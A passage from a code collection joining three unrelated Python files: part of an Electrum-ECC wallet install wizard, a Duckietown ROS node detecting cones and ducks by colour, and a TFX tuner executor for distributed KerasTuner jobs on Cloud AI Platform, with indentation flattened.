self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-ECC - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-ECC wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-ECC communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
static_object_detector_node.py
|
#!/usr/bin/env python
import cv2
import numpy as np
import rospy
from sensor_msgs.msg import Image
from std_msgs.msg import Float32
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import ObstacleImageDetection, ObstacleImageDetectionList, ObstacleType, Rect, BoolStamped
import sys
import threading
from rgb_led import *
class Matcher:
CONE = [np.array(x, np.uint8) for x in [[0,80,80], [22, 255,255]] ]
DUCK = [np.array(x, np.uint8) for x in [[25,100,150], [35, 255, 255]] ]
terms = {ObstacleType.CONE :"cone", ObstacleType.DUCKIE:"duck"}
def __init__(self):
self.cone_color_low = self.setupParam("~cone_low", [0,80,80])
self.cone_color_high = self.setupParam("~cone_high", [22, 255,255])
self.duckie_color_low = self.setupParam("~duckie_low", [25, 100, 150])
self.duckie_color_high = self.setupParam("~duckie_high", [35, 255,255])
self.CONE = [np.array(x, np.uint8) for x in [self.cone_color_low, self.cone_color_high] ]
self.DUCK = [np.array(x, np.uint8) for x in [self.duckie_color_low, self.duckie_color_high] ]
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name,value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " %('static_object_detector_node',param_name,value))
return value
def get_filtered_contours(self,img, contour_type):
hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
if contour_type == "CONE":
frame_threshed = cv2.inRange(hsv_img, self.CONE[0], self.CONE[1])
ret,thresh = cv2.threshold(frame_threshed,22,255,0)
elif contour_type == "DUCK_COLOR":
frame_threshed = cv2.inRange(hsv_img, self.DUCK[0], self.DUCK[1])
ret,thresh = cv2.threshold(frame_threshed,30,255,0)
elif contour_type == "DUCK_CANNY":
frame_threshed = cv2.inRange(hsv_img, self.DUCK[0], self.DUCK[1])
frame_threshed = cv2.adaptiveThreshold(frame_threshed,255,\
cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,5,2)
thresh = cv2.Canny(frame_threshed, 100,200)
else:
return
filtered_contours = []
_, contours, hierarchy = cv2.findContours(\
thresh,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)
contour_area = [ (cv2.contourArea(c), (c) ) for c in contours]
contour_area = sorted(contour_area,reverse=True, key=lambda x: x[0])
height,width = img.shape[:2]
for (area,(cnt)) in contour_area:
# plot box around contour
x,y,w,h = cv2.boundingRect(cnt)
box = (x,y,w,h)
d = 0.5*(x-width/2)**2 + (y-height)**2
if not(h>15 and w >10 and h<200 and w<200 and d < 120000):
continue
if contour_type == "DUCK_CANNY":
continue
if contour_type =="DUCK_COLOR": # extra filtering to remove lines
if not(h>25 and w>25):
continue
if d>90000:
if not(h>35 and w>35):
continue
if cv2.contourArea(cnt)==0:
continue
val = cv2.arcLength(cnt,True)**2/ cv2.contourArea(cnt)
if val > 35: continue
rect = cv2.minAreaRect(cnt)
ctr, sides, deg = rect
val = 0.5*cv2.arcLength(cnt,True) / (w**2+h**2)**0.5
if val < 1.12: continue
#if area > 1000: continue
mask = np.zeros(thresh.shape,np.uint8)
cv2.drawContours(mask,[cnt],0,255,-1)
mean_val = cv2.mean(img,mask = mask)
aspect_ratio = float(w)/h
filtered_contours.append( (cnt, box, d, aspect_ratio, mean_val) )
return filtered_contours
def contour_match(self, img):
'''
Returns 1. Image with bounding boxes added
2. an ObstacleImageDetectionList
'''
object_list = ObstacleImageDetectionList()
object_list.list = []
height,width = img.shape[:2]
object_list.imwidth = width
object_list.imheight = height
# get filtered contours
cone_contours = self.get_filtered_contours(img, "CONE")
duck_contours = self.get_filtered_contours(img, "DUCK_COLOR")
all_contours = [duck_contours, cone_contours]
for i, contours in enumerate(all_contours):
for (cnt, box, ds, aspect_ratio, mean_color) in contours:
# plot box around contour
x,y,w,h = box
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,self.terms[i], (x,y), font, 0.5,mean_color,4)
cv2.rectangle(img,(x,y),(x+w,y+h), mean_color,2)
r = Rect()
r.x = x
r.y = y
r.w = w
r.h = h
t = ObstacleType()
t.type = i
d = ObstacleImageDetection()
d.bounding_box = r
d.type = t
object_list.list.append(d);
return img, object_list
class StaticObjectDetectorNode:
def __init__(self):
self.name = 'static_object_detector_node'
self.tm = Matcher()
self.active = True
self.thread_lock = threading.Lock()
self.sub_image = rospy.Subscriber("~image_raw", Image, self.cbImage, queue_size=1)
self.sub_switch = rospy.Subscriber("~switch",BoolStamped, self.cbSwitch, queue_size=1)
self.pub_image = rospy.Publisher("~cone_detection_image", Image, queue_size=1)
self.pub_detections_list = rospy.Publisher("~detection_list", ObstacleImageDetectionList, queue_size=1)
self.bridge = CvBridge()
turn_off_LEDs(speed=5)
rospy.loginfo("[%s] Initialized." %(self.name))
def cbSwitch(self,switch_msg):
self.active = switch_msg.data
def cbImage(self,image_msg):
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
return
try:
image_cv=self.bridge.imgmsg_to_cv2(image_msg,"bgr8")
except CvBridgeErrer as e:
print e
img, detections = self.tm.contour_match(image_cv)
detections.header.stamp = image_msg.header.stamp
detections.header.frame_id = image_msg.header.frame_id
self.pub_detections_list.publish(detections)
height,width = img.shape[:2]
try:
self.pub_image.publish(self.bridge.cv2_to_imgmsg(img, "bgr8"))
except CvBridgeError as e:
print(e)
self.thread_lock.release()
if __name__=="__main__":
rospy.init_node('static_object_detector_node')
node = StaticObjectDetectorNode()
rospy.spin()
|
executor.py
|
# Lint as: python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper class to start TFX Tuner as a Job on Google Cloud AI Platform."""
import datetime
import json
import multiprocessing
import os
from typing import Any, Dict, List, Text
from absl import logging
from tfx import types
from tfx.components.base import base_executor
from tfx.components.trainer import constants
from tfx.components.tuner import executor as tuner_executor
from tfx.extensions.google_cloud_ai_platform import runner
from tfx.extensions.google_cloud_ai_platform.trainer import executor as ai_platform_trainer_executor
from tfx.utils import json_utils
# Directory to store intermediate hyperparamter search progress.
# TODO(b/160188053): Use the same temp dir as the calling Executor.
_WORKING_DIRECTORY = '/tmp'
class Executor(base_executor.BaseExecutor):
"""Tuner executor that launches parallel tuning flock on Cloud AI Platform.
This executor starts a Cloud AI Platform (CAIP) Training job with a flock of
workers, where each worker independently executes Tuner's search loop on
the single machine.
Per KerasTuner's design, distributed Tuner's identity is controlled by the
environment variable (KERASTUNER_TUNER_ID) to each workers in the CAIP
training job. Those environment variables are configured in each worker of
CAIP training job's worker flock.
In addition, some implementation of KerasTuner requires a separate process
to centrally manage the state of tuning (called as 'chief oracle') which is
consulted by all workers according as another set of environment variables
(KERASTUNER_ORACLE_IP and KERASTUNER_ORACLE_PORT).
In summary, distributed tuning flock by Cloud AI Platform Job is structured
as follows.
Executor.Do() -> launch _Executor.Do() on a possibly multi-worker CAIP job ->
-+> master -> _search() (-> create a subprocess -> run the chief oracle.)
| +> trigger a single tuner.search()
+> worker -> _search() -> trigger a single tuner.search()
+> worker -> _search() -> trigger a single tuner.search()
"""
# TODO(b/160013376): Refactor common parts with Trainer Executor.
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Starts a Tuner component as a job on Google Cloud AI Platform."""
self._log_startup(input_dict, output_dict, exec_properties)
custom_config = json_utils.loads(
exec_properties.get(constants.CUSTOM_CONFIG_KEY, 'null'))
if custom_config is None:
raise ValueError('custom_config is not provided')
if not isinstance(custom_config, Dict):
raise TypeError('custom_config in execution properties must be a dict, '
'but received %s' % type(custom_config))
training_inputs = custom_config.get(
ai_platform_trainer_executor.TRAINING_ARGS_KEY)
if training_inputs is None:
err_msg = ('\'%s\' not found in custom_config.' %
ai_platform_trainer_executor.TRAINING_ARGS_KEY)
logging.error(err_msg)
raise ValueError(err_msg)
tune_args = tuner_executor.get_tune_args(exec_properties)
num_parallel_trials = (1
if not tune_args else tune_args.num_parallel_trials)
if num_parallel_trials > 1:
# Chief node is also responsible for conducting tuning loop.
desired_worker_count = num_parallel_trials - 1
if training_inputs.get('workerCount') != desired_worker_count:
logging.warning('workerCount is overridden with %s',
desired_worker_count)
training_inputs['workerCount'] = desired_worker_count
training_inputs['scaleTier'] = 'CUSTOM'
training_inputs['masterType'] = (
training_inputs.get('masterType') or 'standard')
training_inputs['workerType'] = (
training_inputs.get('workerType') or 'standard')
# 'tfx_tuner_YYYYmmddHHMMSS' is the default job ID if not specified.
job_id = (
custom_config.get(ai_platform_trainer_executor.JOB_ID_KEY) or
'tfx_tuner_{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S')))
# TODO(b/160059039): Factor out label creation to a utility function.
executor_class = _WorkerExecutor
executor_class_path = '%s.%s' % (executor_class.__module__,
executor_class.__name__)
# Note: exec_properties['custom_config'] here is a dict.
return runner.start_aip_training(input_dict, output_dict, exec_properties,
executor_class_path, training_inputs,
job_id)
def _need_chief_oracle(exec_properties: Dict[Text, Any]) -> bool:
"""Returns True if the Tuner instance requires a chief oracle."""
# TODO(b/160902662): Skip chief oracle for CloudTuner that does not require
# chief oracle for distributed tuning (it is a no-op,
# because it simply forwards to the AI Platform Optimizer
# service).
del exec_properties
return True
class _WorkerExecutor(base_executor.BaseExecutor):
"""TFX Tuner executor impl as a worker in a Google Cloud AI Platform job."""
def _start_chief_oracle_in_subprocess(
self, input_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, List[types.Artifact]]):
"""Starts a chief oracle in a subprocess."""
def _run_chief_oracle() -> None:
"""Invoke chief oracle, and listen to the open port."""
logging.info('chief_oracle() starting...')
# Per KerasTuner's specification, configuration of chief oracle is set
# by environment variables. This only affects the current sub-process
# which is single-threaded, but not the main process. As such, mutation
# of this otherwise global state is safe.
os.environ['KERASTUNER_ORACLE_IP'] = '0.0.0.0'
os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port
os.environ['KERASTUNER_TUNER_ID'] = 'chief'
logging.info('Binding chief oracle server at: %s:%s',
os.environ['KERASTUNER_ORACLE_IP'],
os.environ['KERASTUNER_ORACLE_PORT'])
# By design of KerasTuner, chief oracle blocks forever. Ref.
# https://github.com/keras-team/keras-tuner/blob/e8b0ad3ecae471c73e17cb41f37e6f99202ac0dd/kerastuner/engine/base_tuner.py#L74-L76
tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY)
# Because of KerasTuner's interface whereby behavior is controlled
# by environment variables, starting the chief oracle in a sub-process,
# as opposed to another thread in the main process, in order not to leak
# the environment variables.
result = multiprocessing.Process(target=_run_chief_oracle)
result.start()
logging.info('Chief oracle started at PID: %s', result.pid)
return result
def _search(self, input_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, List[types.Artifact]]):
"""Conducts a single search loop, setting up chief oracle if necessary."""
# If not distributed, simply conduct search and return.
if self._tuner_id is None:
return tuner_executor.search(input_dict, exec_properties,
_WORKING_DIRECTORY)
if _need_chief_oracle(exec_properties):
# If distributed search, and this node is chief, start a chief oracle
# process before conducting search by itself.
if self._is_chief:
# Tuner with chief oracle will block forever. As such, start it in
# a subprocess and manage its lifecycle by the main process.
# Note that the Tuner with chief oracle does not run search loop,
# hence does not run TensorFlow code in the subprocess.
self._chief_process = self._start_chief_oracle_in_subprocess(
input_dict, exec_properties)
# If distributed, both master and worker need to know where the oracle is.
# Per KerasTuner's interface, it is configured through env variables.
# This only affects the current main process, which is designed to be
# single-threaded. As such, mutation of this otherwise global state is
# safe.
os.environ['KERASTUNER_ORACLE_IP'] = self._master_addr
os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port
logging.info('Oracle chief is known to be at: %s:%s',
os.environ['KERASTUNER_ORACLE_IP'],
os.environ['KERASTUNER_ORACLE_PORT'])
# Conduct tuner search loop, regardless of master or worker.
# There is only one Tuner instance in the current process, as such,
# controllling the id of the Tuner instance via environment variable
# is safe.
os.environ['KERASTUNER_TUNER_ID'] = self._tuner_id
logging.info('Setting KERASTUNER_TUNER_ID with %s',
os.environ['KERASTUNER_TUNER_ID'])
return tuner_executor.search(input_dict, exec_properties,
_WORKING_DIRECTORY)
def __init__(self, context):
super(_WorkerExecutor, self).__init__(context)
# Those fields are populated only when running in distribution.
self._is_chief = False
self._tuner_id = None
self._master_addr = None
self._master_port = None
self._chief_process = None # Populated when the chief oracle is started.
# Initialize configuration of distribution according to CLUSTER_SPEC
